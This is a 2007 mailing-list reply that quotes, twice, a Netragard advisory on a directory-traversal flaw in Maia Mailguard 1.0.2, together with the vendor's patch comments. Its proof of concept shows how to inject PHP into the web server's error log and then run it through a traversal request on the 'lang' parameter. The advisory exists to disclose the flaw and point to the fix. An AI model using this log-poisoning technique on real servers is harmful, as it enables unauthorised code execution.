Re: [AMaViS-user] FW: [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary Code Execution][NETRAGARD-20070628]

From: David <df(at)auto123.com>
Date: Fri Jul 06 2007 - 16:45:44 EDT

Jo Rhett wrote:
> How does this relate to amavisd?
>
> On Jul 5, 2007, at 4:18 PM, Michael Scheidell wrote:
>
>
>> didn't see this anywhere, thought you might want to know:
>>
>>
>> --
>> Michael Scheidell, CTO
>> SECNAP Network Security Corporation
>> Keep up to date with latest information on IT security: Real time
>> security alerts:
>> http://www.secnap.com/news
>>
>>
>> -----Original Message-----
>> From: Netragard Security Advisories [mailto:advisories@netragard.com]
>> Sent: Thursday, July 05, 2007 11:19 AM
>> To: vuln@secunia.com; full-disclosure@lists.grok.org.uk;
>> bugtraq@securityfocus.com; vuln@frsirt.com; content@securitydot.net;
>> submissions@packetstormsecurity.org; webmaster@nwc.com;
>> incidents@securityfocus.com
>> Subject: [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary
>> Code Execution][NETRAGARD-20070628]
>>
>>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> *************************** NETRAGARD ADVISORY
>> ************************
>> http://www.netragard.com
>> "We make IT Safe"
>> [Advisory Summary]
>> -
>> ----------------------------------------------------------------------
>> -
>> Advisory Author : Adriel T. Desautels
>> Advisory ID : NETRAGARD-20070628
>> Product Name : Maia Mailguard
>> Product Version : <= 1.0.2 FreeBSD and Possibly More
>> Vendor Name : http://www.miamailguard.com
>> Type of Vulnerability : Directory Traversal / File Read
>> Effort (1-10 where 1 == easy) : 2
>> Impact : Arbitrary Code Execution
>> Vendor Notified : Yes
>> Patch Released : N/A
>> Discovery Date : 06/10/2007
>>
>>
>>
>>
>> [POSTING NOTICE]
>> -
>> ----------------------------------------------------------------------
>> -
>> If you intend to post this advisory on your web-site you must
>> provide a
>> clickable link back to http://www.netragard.com as the contents of
>> this
>> advisory may be updated without notice.
>>
>>
>>
>>
>> [Product Description]
>> -
>> ----------------------------------------------------------------------
>> -
>> "Maia Mailguard is a web-based interface and management system
>> based on
>> the popular amavisd-new e-mail scanner and SpamAssassin. Written in
>> Perl
>> and PHP, Maia Mailguard gives end-users control over how their mail is
>> processed by virus scanners and spam filters, while giving mail
>> administrators the power to configure site-wide defaults and limits."
>>
>> - -- http://www.miamailguard.com --
>>
>>
>>
>>
>> [Technical Summary]
>> -
>> ----------------------------------------------------------------------
>> -
>> A Directory Traversal vulnerability exists in the Maia Mailguard Web
>> Application that enables an attacker to execute arbitrary commands on
>> the affected system.
>>
>>
>>
>>
>> [Technical Details]
>> -
>> ----------------------------------------------------------------------
>> -
>> Improper input validation on the "lang" variable in Maia Mailguard web
>> application has resulted in a Directory Traversal vulnerability
>> that can
>> be used to execute arbitrary commands on he affected system, or, to
>> read
>> arbitrary files on the affected system.
>>
>>
>>
>>
>> [Proof Of Concept]
>> -
>> ----------------------------------------------------------------------
>> -
>> 1-) An attacker can inject code into the httpd-error.log file by
>> connecting to port 80 on the affected system and issuing a "get
>> <CODE HERE>" command. See example below:
>>
>> the-wretched:~ simon$ telnet maiatest.snosoft.com 80
>> Trying 10.0.0.128...
>> Connected to maiatest.snosoft.com.
>> Escape character is '^]'.
>>
>> get &ltpre>><?php system('ls -laf /var/log');?>
>>
>> HTTP/1.1 400 Bad Request
>> Date: Wed, 20 Jun 2007 21:31:58 GMT
>> Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/
>> 2.8.28
>> OpenSSL/0.9.7e-p1
>> Connection: close
>> Content-Type: text/html; charset=iso-8859-1
>>
>> 2-) Once the attacker has injected his code into the log file, the
>> code
>> can be executed by forcing the web application to read the log
>> file.
>> When the log file is read, the code is executed. Below is an
>> example
>> of code execution:
>>
>> the-wretched:~ simon$ wget
>> http://maiatest.snosoft.com/maia/login.php?lang=
>> ../../../../../../../../../../../../../var/log/httpd-error.log%00.txt
>>
>>
>>
>>
>> [Vendor Status]
>> -
>> ----------------------------------------------------------------------
>> -
>> Vendor has been notified and was quick to resolve the issue.
>>
>>
>>
>>
>> [Vendor Comments]
>> -
>> ----------------------------------------------------------------------
>> -
>> "The only addition that I had was that it seems to only affect systems
>> like freebsd... It would be nice to nail that down. It suspect the
>> root security issue is really with the php and file-system
>> interaction... my patch just simply works around and blocks the root
>> problem. From my developer point of view, I'm asking for one file
>> and the file-system is giving us something else. That's a serious
>> risk.
>> If we could at least express that concern, I think that would be
>> prudent.
>>
>> Chicken and egg problem, I was kinda waiting on you to post our own
>> ticket, but.... I can add a comment afterwards. OK. Here's our ticket
>> which also references the changeset:
>>
>> http://www.maiamailguard.org/maia/ticket/479
>>
>> A unified patch may be retrieved from: http://www.maiamailguard.org/
>> maia/changeset/1184?format=diff&new=1184
>>
>> David Morton"
>>
>>
>>
>>
>> [Disclaimer]
>> -
>> ----------------------http://
>> www.netragard.com-------------------------
>> Netragard, L.L.C. assumes no liability for the use of the information
>> provided in this advisory. This advisory was released in an effort to
>> help the I.T. community protect themselves against a potentially
>> dangerous security hole. This advisory is not an attempt to solicit
>> business.
>>
>> <a href="http://www.netragard.com>
>> http://www.netragard.com
>> </a>
>>
>>
>>
>>
>>
>>
>>
>> -----BEGIN PGP SIGNATURE-----
>> Version: GnuPG v1.4.5 (Darwin)
>>
>> iD8DBQFGjQvXQwbn1P9Iaa0RAtkkAKCLZzwMLPPejeXmpXoYCMqvGdaF4QCgqALm
>> 4LRwop09S8YjiKDwTSpvgXY=
>> =TeIH
>> -----END PGP SIGNATURE-----
>>
>> ______________________________________________________________________
>> ___
>> This email has been scanned and certified safe by SpammerTrap(tm).
>> For Information please see http://www.spammertrap.com
>> ______________________________________________________________________
>> ___
>>
>>
>> *************************** NETRAGARD ADVISORY
>> ************************
>> http://www.netragard.com
>> "We make IT Safe"
>> [Advisory Summary]
>> ----------------------------------------------------------------------
>> -
>> Advisory Author : Adriel T. Desautels
>> Advisory ID : NETRAGARD-20070628
>> Product Name : Maia Mailguard
>> Product Version : <= 1.0.2 (All Platforms)
>> Vendor Name : http://www.miamailguard.com
>> Type of Vulnerability : Directory Traversal / File Read
>> Effort (1-10 where 1 == easy) : 2
>> Impact : Arbitrary Code Execution
>> Vendor Notified : Yes
>> Patch Released : N/A
>> Discovery Date : 06/10/2007
>>
>> [POSTING NOTICE]
>> ----------------------------------------------------------------------
>> -
>> If you intend to post this advisory on your web-site you must provide
>> a clickable link back to http://www.netragard.com as the contents of
>> this advisory may be updated without notice.
>>
>> [Product Description]
>> ----------------------------------------------------------------------
>> -
>> "Maia Mailguard is a web-based interface and management system
>> based on
>> the popular amavisd-new e-mail scanner and SpamAssassin. Written in
>> Perl
>> and PHP, Maia Mailguard gives end-users control over how their mail is
>> processed by virus scanners and spam filters, while giving mail
>> administrators the power to configure site-wide defaults and limits."
>>
>> -- http://www.miamailguard.com --
>>
>> [Technical Summary]
>> ----------------------------------------------------------------------
>> -
>> A Directory Traversal vulnerability exists in the Maia Mailguard Web
>> Application that enables an attacker to execute arbitrary commands on
>> the affected system.
>>
>> [Technical Details]
>> ----------------------------------------------------------------------
>> -
>> Improper input validation on the "lang" variable in Maia Mailguard web
>> application has resulted in a Directory Traversal vulnerability that
>> can be used to execute arbitrary commands on he affected system,
>> or, to
>> read arbitrary files on the affected system.
>>
>> [Proof Of Concept]
>> ----------------------------------------------------------------------
>> -
>> 1-) An attacker can inject code into the httpd-error.log file by
>> connecting to port 80 on the affected system and issuing a "get
>> <CODE HERE>" command. See example below:
>>
>> the-wretched:~ simon$ telnet maiatest.snosoft.com 80
>> Trying 10.0.0.128...
>> Connected to maiatest.snosoft.com.
>> Escape character is '^]'.
>>
>> get &ltpre>><?php system('ls -laf /var/log');?>
>>
>> HTTP/1.1 400 Bad Request
>> Date: Wed, 20 Jun 2007 21:31:58 GMT
>> Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/
>> 2.8.28 OpenSSL/0.9.7e-p1
>> Connection: close
>> Content-Type: text/html; charset=iso-8859-1
>>
>> 2-) Once the attacker has injected his code into the log file, the
>> code
>> can be executed by forcing the web application to read the log
>> file.
>> When the log file is read, the code is executed. Below is an
>> example
>> of code execution:
>>
>> the-wretched:~ simon$ wget http://maiatest.snosoft.com/maia/
>> login.php?lang=
>> ../../../../../../../../../../../../../var/log/httpd-error.log%00.txt
>>
>> [Vendor Status]
>> ----------------------------------------------------------------------
>> -
>> Vendor has been notified and has been very quick to respond to and
>> patch this issue.
>>
>> [Vendor Comments]
>> ----------------------------------------------------------------------
>> -
>> "The only addition that I had was that it seems to only affect systems
>> like freebsd... It would be nice to nail that down. It suspect the
>> root security issue is really with the php and filesystem
>> interaction... my patch just simply works around and blocks the root
>> problem. From my developer point of view, I'm asking for one file
>> and the filesystem is giving us something else. That's a serious
>> risk. If we could at least express that concern, I think that would
>> be prudent.
>>
>> Chicken and egg problem, I was kinda waiting on you to post our own
>> ticket, but.... I can add a comment afterwards. OK.
>> Here's our ticket which also references the changeset:
>>
>> http://www.maiamailguard.org/maia/ticket/479
>>
>> A unified patch may be retrieved from: http://www.maiamailguard.org/
>> maia/changeset/1184?format=diff&new=1184
>>
>> David Morton"
>>
>>
>>
>> [Disclaimer]
>> ----------------------http://
>> www.netragard.com-------------------------
>> Netragard, L.L.C. assumes no liability for the use of the information
>> provided in this advisory. This advisory was released in an effort to
>> help the I.T. community protect themselves against a potentially
>> dangerous security hole. This advisory is not an attempt to solicit
>> business.
>>
>> <a href="http://www.netragard.com>
>> http://www.netragard.com
>> </a>
>>
>>
>>
>>
>>
>>
>>
>> ----------------------------------------------------------------------
>> ---
>> This SF.net email is sponsored by DB2 Express
>> Download DB2 Express C - the FREE version of DB2 express and take
>> control of your XML. No limits. Just data. Click to get it now.
>> http://sourceforge.net/powerbar/db2/
>> _______________________________________________
>> AMaViS-user mailing list
>> AMaViS-user@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/amavis-user
>> AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3
>> AMaViS-HowTos:http://www.amavis.org/howto/
>>
>
>

A lot of people use Maia Mailguard to control/configure their amavisd-new installations. So it makes sense to post the warning here as a friendly "in case you didn't know". Not everyone subscribes to every mailing list for every product they use. Remember, just because amavisd-new isn't affected directly (or at all in this case) doesn't mean it's not useful to know.

---

This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/

---

AMaViS-user mailing list
AMaViS-user@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/ Received on Fri Jul 6 16:45:52 2007